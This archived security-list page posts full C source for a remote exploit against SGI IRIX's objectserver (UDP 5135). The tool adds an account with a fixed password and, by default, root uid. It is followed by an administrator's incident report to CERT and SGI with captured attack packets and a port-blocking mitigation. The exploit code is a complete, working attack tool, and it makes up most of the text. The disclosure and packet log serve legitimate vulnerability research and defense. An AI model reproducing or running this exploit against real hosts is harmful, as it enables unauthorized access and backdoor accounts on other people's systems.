SGI IRIX objectserver remote exploit - Remotely adds account to the IRIX system. Patched February, 1998. Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2.
50cc9680c224be9e0219d599f01be7fd1deae2ff3856942ef92ade8bb1049054At 08:52 AM 3/29/2000 -0500, Howard wrote:
>Since the patches are now officially released, I feel I can finally
>release the details of the SGI objectserver vulnerability. This
>vulnerability was initailly reported to CERT and SGI Security on
>October 6, 1997. A beta version of patch 2849 was provided in
>February 1998.
>
Hi. As a legitimate function of my work I routinely archive and catalog
vulnerability information and exploit code. In the interest of
full-disclosure and in possibly helping system administrators evaluate
the security of their SGI boxen, I am attaching the remote exploit for
Irix objectserver (udp 5135).
There are big problems with the US government right now - if you are
doing security work (let alone cracking!) be advised that things are
getting seriously fucked. See the "L0phtcrack as a burglary tool"
article? See all these kids getting PRISON sentences for typing? The
government isn't playing by sane rules. Be prepared. Be awake!
Marcy
/* Copyright (c) July 1997 Last Stage of Delirium */
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */
/* Last Stage of Delirium */
/* */
/* The contents of this file may be disclosed to third */
/* parties, copied and duplicated in any form, in whole */
/* or in part, without the prior written consent of LSD. */
/* SGI objectserver "account" exploit
*/
/* Remotely adds account to the IRIX system.
*/
/* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,
*/
/* which was supposed to be free from this bug (SGI 19960101-01-PX).
*/
/* The vulnerability "was corrected" on 6.2 systems but
*/
/* SGI guys fucked up the job and it still can be exploited.
*/
/* The same considers patched 5.x,6.0.1 and 6.1 systems
*/
/* where SGI released patches DONT work.
*/
/* The only difference is that root account creation is blocked.
*/
/*
*/
/* usage: ob_account ipaddr [-u username] [-i userid] [-p]
*/
/* -i specify userid (other than 0)
*/
/* -u change the default added username
*/
/* -p probe if there's the objectserver running
*/
/*
*/
/* default account added : lsd
*/
/* default password : m4c10r4!
*/
/* default user home directory : /tmp/.new
*/
/* default userid : 0
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/uio.h>
#include <errno.h>
#include <stdio.h>
#define E if(errno) perror("");
struct iovec iov[2];
struct msghdr msg;
char buf1[1024],buf2[1024];
int sck;
unsigned long adr;
void show_msg(){
char *p,*p1;
int i,j,c,d;
c=0;
printf("%04x ",iov[0].iov_len);
p=(char*)iov[0].iov_base;
for(i=0;i<iov[0].iov_len;i++){
c++;
if(c==17){
printf(" ");
p1=p;p1=p1-16;
for(j=0;j<16;j++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
c=1;
printf("\n ");
}
printf("%02x ",(unsigned char)*p++);
}
printf(" ");
p1=p;p1=p1-c;
if(c>1){
for(i=0;i<(16-c);i++) printf(" ");
for(i=0;i<c;i++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
}
printf("\n");
if(msg.msg_iovlen!=2) return;
c=0;
p=(char*)iov[0].iov_base;
d=p[0x0a]*0x100+p[0x0b];
p=(char*)iov[1].iov_base;
printf("%04x ",d);
for(i=0;i<d;i++){
c++;
if(c==17){
printf(" ");
p1=p;p1=p1-16;
for(j=0;j<16;j++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
c=1;
printf("\n ");
}
printf("%02x ",(unsigned char)*p++);
}
printf(" ");
p1=p;p1=p1-c;
if(c>1){
for(i=0;i<(16-c);i++) printf(" ");
for(i=0;i<c;i++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
}
printf("\n");
fflush(stdout);
}
char numer_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};
char numer_two[0x24]={
0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
0x01,0x07,0x01,0x01
};
char dodaj_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};
char dodaj_two[1024]={
0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a,
0x01,0x01,0x3b,0x01,0x78
};
char dodaj_three[27]={
0x01,0x02,0x0a,0x01,0x01,0x3b,
0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x01,0x01,0x09,0x43,0x01
};
char dodaj_four[200]={
0x17,0x0b,0x01,0x01,0x3b,0x01,0x02,
0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c,
0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17,
0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07,
0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01,
0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43,
0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,
0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b,
0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01,
0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b,
0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01,
0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03,
0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d,
0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e,
0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01,
0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09,
0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f,
0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01,
0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43,
0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b,
0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01,
0x03
};
char dodaj_five[39]={
0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08,
0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D'
};
char fake_adrs[0x10]={
0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
char *get_sysinfo(){
int i=0,j,len;
iov[0].iov_base=numer_one;
iov[0].iov_len=0x10;
iov[1].iov_base=numer_two;
iov[1].iov_len=0x24;
msg.msg_name=(caddr_t)fake_adrs;
msg.msg_namelen=0x10;
msg.msg_iov=iov;
msg.msg_iovlen=2;
msg.msg_accrights=(caddr_t)0;
msg.msg_accrightslen=0;
printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
printf("\n");
iov[0].iov_base=buf1;
iov[1].iov_base=buf2;
iov[1].iov_len=0x200;
msg.msg_iovlen=2;
printf("RM: --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0));
show_msg();
printf("\n");
while(i<len-0x16)
if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
printf("remote system ID: ");
for(j=0;j<buf2[i+6];j++) printf("%02x ",buf2[i+7+j]);
printf("\n");
return(&buf2[i+6]);
}else i++;
return(0);
}
void new_account(int len){
iov[0].iov_base=dodaj_one;
iov[0].iov_len=0x10;
iov[1].iov_base=dodaj_two;
iov[1].iov_len=len;
msg.msg_name=(caddr_t)fake_adrs;
msg.msg_namelen=0x10;
msg.msg_iov=iov;
msg.msg_iovlen=2;
msg.msg_accrights=(caddr_t)0;
msg.msg_accrightslen=0;
printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
printf("\n");
iov[0].iov_base=buf1;
iov[1].iov_base=buf2;
iov[1].iov_len=0x200;
msg.msg_iovlen=2;
printf("RM: --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
printf("\n");
}
void info(char *text){
printf("SGI objectserver \"account\" exploit by LSD\n");
printf("usage: %s ipaddr [-u username] [-i userid] [-p]\n",text);
}
main(int argc,char **argv){
int c,user,version,probe;
unsigned int offset,gr_offset,userid;
char *sys_info;
char username[20];
extern char *optarg;
extern int optind;
if(argc<2) {info(argv[0]);exit(0);}
optind=2;
offset=40;
user=version=probe=0;
while((c=getopt(argc,argv,"u:i:p"))!=-1)
switch(c){
case 'u': strcpy(username,optarg);
user=1;
break;
case 'i': version=62;
userid=atoi(optarg);
break;
case 'p': probe=1;
break;
case '?':
default : info(argv[0]);
exit(1);
}
sck=socket(AF_INET,SOCK_DGRAM,0);
adr=inet_addr(argv[1]);
memcpy(&fake_adrs[4],&adr,4);
if(!(sys_info=get_sysinfo())){
printf("error: can't get system ID for %s.\n",argv[1]);
exit(1);
}
if(!probe){
memcpy(&dodaj_two[0x0d],sys_info,sys_info[0]+1);
memcpy(&dodaj_two[0x0d+sys_info[0]+1],&dodaj_three[0],27);
offset+=sys_info[0]+1;
if(!user) strcpy(username,"lsd");
dodaj_two[offset++]=strlen(username);
strcpy(&dodaj_two[offset],username);offset+=strlen(username);
memcpy(&dodaj_two[offset],&dodaj_four[0],200);
offset+=200;
gr_offset=offset-15;
if(version){
dodaj_two[gr_offset++]='u';
dodaj_two[gr_offset++]='s';
dodaj_two[gr_offset++]='e';
dodaj_two[gr_offset++]='r';
dodaj_two[offset++]=0x02;
dodaj_two[offset++]=userid>>8;
dodaj_two[offset++]=userid&0xff;
}
else dodaj_two[offset++]=0x00;
memcpy(&dodaj_two[offset],&dodaj_five[0],39);
offset+=39;
dodaj_one[10]=offset>>8;
dodaj_one[11]=offset&0xff;
new_account(offset);
}
}
/* end g23 exploit post */
__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Howard M. Kash III" <hmkash@ARL.MIL>
Subject: Objectserver vulnerability
X-To: BUGTRAQ@securityfocus.com
Since the patches are now officially released, I feel I can finally
release the details of the SGI objectserver vulnerability. This
vulnerability was initailly reported to CERT and SGI Security on
October 6, 1997. A beta version of patch 2849 was provided in
February 1998.
Howard
----- Forwarded message # 1:
Date: Mon, 6 Oct 97 7:09:51 EDT
From: "Howard M. Kash III"
To: cert@cert.org, security-alert@sgi.com
Subject: URGENT - new SGI vulnerability
[Internal error while calling pgp, raw data follows]
-----BEGIN PGP SIGNED MESSAGE-----
URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT
SGI objectserver vulnerabilty allows remote users to create accounts.
Yesterday two of our hosts were compromised by an (as far as I could
determine) unknown, unpatched bug in SGI's objectserver. The attack
consisted of sending UDP packets to port 5135 (see below). The
result was a non-root account being added to the system. The two
compromised hosts were running IRIX 6.2, but the vulnerability may
affect other versions of IRIX. The vulnerability does not appear to
give root access directly, as the attackers used other IRIX
vulnerabilities to gain root access after logging into the new
account.
Attached are the UDP packets exchanged between the attacking host
(aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP
addresses have been masked to protect the guilty - I mean innocent
until proven guilty. The result of this sequence of packets is the
following line added to /etc/passwd:
gueust:x:5002:20:LsD:/tmp/.new:/bin/csh
An entry must also be added to /etc/shadow since the attacker then
logs into the new account with a password.
As a temporary measure we have blocked all traffic to port 5135 at
our gateway.
Howard Kash
U.S. Army Research Lab
- ------------------------------------------------------------------------
TCP and UDP headers have been separated out. I've decoded some of the
packet contents into its ascii equivalent below the line.
16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
tttt tttt
112a 140f 003c 6516
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
4500 007b 0644 0000 3a11 26dc tttt tttt
aaaa aaaa
140f 112a 0067 0d37
0001 0186
0001 0000 0000 004f 0000 0000 2903 0043
000a 0080 4300 8043 0105 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
020a 0101 3b01 7804 690a 799a 0103 0a01
013b 0178 0469 0a79 9a01 04
16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
tttt tttt
112a 140f 0140 a1b2
0001 0000
0001 0000 0000 0128 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
g u e u s t
170b 0101 3b01 0201 0101 0943 0103 4c73
L s
4417 0b01 013b 016e 0106 0109 4300 170b
D
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
/ t m p / . n e w
016e 0112 0109 4301 0470 6f6f 7417 0b01
013b 016e 0102 0103 0017 0b01 013b 016e
0113 0109 4301 082f 6269 6e2f 6373 6817
/ b i n / c s h
0b01 013b 016e 010f 0109 4301 074c 7344
2f43 5444
16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
4500 0045 0646 0000 3a11 2710 tttt tttt
aaaa aaaa
140f 112a 0031 0ef5
0001 0187
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 39
16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
tttt tttt
112f 140f 003c 6511
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
4500 0088 0669 0000 3a11 26aa tttt tttt
aaaa aaaa
140f 112f 0074 3f4f
0001 0188
0001 0000 0000 005c 0000 0000 2903 0043
000a 0080 4300 8043 0106 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
390a 0101 3b01 7804 690a 799a 0102 0a01
013b 0178 0469 0a79 9a01 030a 0101 3b01
7804 690a 799a 0104
16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
tttt tttt
112f 140f 0142 1399
0001 0000
0001 0000 0000 012a 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
170b 0101 3b01 0201 0101 0943 0103 4c73
4417 0b01 013b 016e 0106 0109 4300 170b
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
016e 0112 0109 4301 0475 7365 7217 0b01
013b 016e 0102 0103 0213 8a17 0b01 013b
016e 0113 0109 4301 082f 6269 6e2f 6373
6817 0b01 013b 016e 010f 0109 4301 074c
7344 2f43 5444
16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
4500 0045 0671 0000 3a11 26e5 tttt tttt
aaaa aaaa
140f 112f 0031 0dee
0001 0189
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 3a
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee
nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w
I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+
n9jE26XP5HU=
=yKsl
-----END PGP SIGNATURE-----
----- End of forwarded messages
[End of raw data]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed